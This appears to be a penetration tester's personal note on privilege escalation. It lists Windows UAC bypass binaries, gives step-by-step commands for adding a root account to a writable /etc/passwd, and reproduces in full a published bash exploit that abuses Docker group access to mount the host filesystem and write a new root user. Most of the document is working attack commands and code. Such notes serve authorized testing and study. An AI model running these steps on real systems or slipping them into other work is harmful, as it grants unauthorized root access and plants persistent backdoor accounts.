#status/done

Privilege Escalation

Enumerate: Post-Exploitation Enumeration

Hint

Also take the information you have enumerated on pervious enumeration phase into account!

Windows

Local Windows Privilege Escalation Checklist

Windows Privilege Escalation.png

UAC Bypass

fodhelper.exe

eventvwr.exe

Linux

Linux Privilege Escalation Checklist

Linux Privilege Escalation.png

/etc/passwd Is Writeable

  1. Create a new password hash with openssl passwd -1 -salt ignite P@ssw0rd. In this case for the password P@ssw0rd
  2. Append that hash to the passwd file like this: echo 'till:$1$ignite$s45Y./FVrOdF58ZmZIgti.:0:0:root:/root:/bin/bash' >> /etc/passwd in this format: till:{HASH}:0:0:root:/root:/bin/bash
  3. Verify that your entry is there: cat /etc/passwd
  4. Change user: su till
  5. Type P@ssw0rd into the prompt

You Are part of the Docker Groups and Docker is Being Executed as Root

# Exploit Title: Docker Daemon - Local Privilege Escalation
# Date: 12 august 2020
# Exploit Author: flast101
# Vendor Homepage: https://www.docker.com/
# Software Link: https://www.docker.com/products/docker-desktop
# Version: all 
# Tested on: tested on version 19.03.7, build 7141c19
# CVE : N/A

# This is a known trick abusing badly configured machines with Docker. This script 
# obtains root privileges from any host account with access to the Docker daemon, 
# and creates a new root user by entering it directly in the /etc/passwd file with the creds 
# you provide. Usually this includes (but not only) accounts in the "docker" group.
#  
# Requirements:
#    - Access to a shell on the target with a user that can run Docker.
#    - The target should have either an internet connection or an image installed in Docker. Use 
#      docker images to check and change the “alpine” image accordingly. If there is no image go 
#      to https://hub.docker.com to get one (tar.gz file with its Dockerfile) and upload it on the 
#      target in your working directory.
#
# Detailed article: https://flast101.github.io/docker-privesc
# Download: https://github.com/flast101/docker-privesc
# Contact: [email protected]

#!/bin/bash

docker_test=$( docker ps | grep "CONTAINER ID" | cut -d " " -f 1-2 ) 

if [ $(id -u) -eq 0 ]; then
    echo "The user islready root. Have fun ;-)"
    exit
    
elif [ "$docker_test" == "CONTAINER ID" ]; then
    echo 'Please write down your new root credentials.'
    read -p 'Choose a root user name: ' rootname
    read -s -p 'Choose a root password: ' passw
    echo -e "\n"
    hpass=$(openssl passwd -1 -salt mysalt $passw)

    echo -e "$rootname:$hpass:0:0:root:/root:/bin/bash" > new_account
    mv new_account /tmp/new_account
    docker run -tid -v /:/mnt/ --name flast101.github.io alpine # CHANGE THIS IF NEEDED
    docker exec -ti flast101.github.io sh -c "cat /mnt/tmp/new_account >> /mnt/etc/passwd"
    sleep 1; echo '...'
    
    echo 'Success! Root user ready. Enter your password to login as root:'
    docker rm -f flast101.github.io
    docker image rm alpine
    rm /tmp/new_account
    su $rootname

else echo "Your account does not have permission to execute docker or docker is not running, aborting..."
    exit

fi

Relevant Note(s): Penetration Testing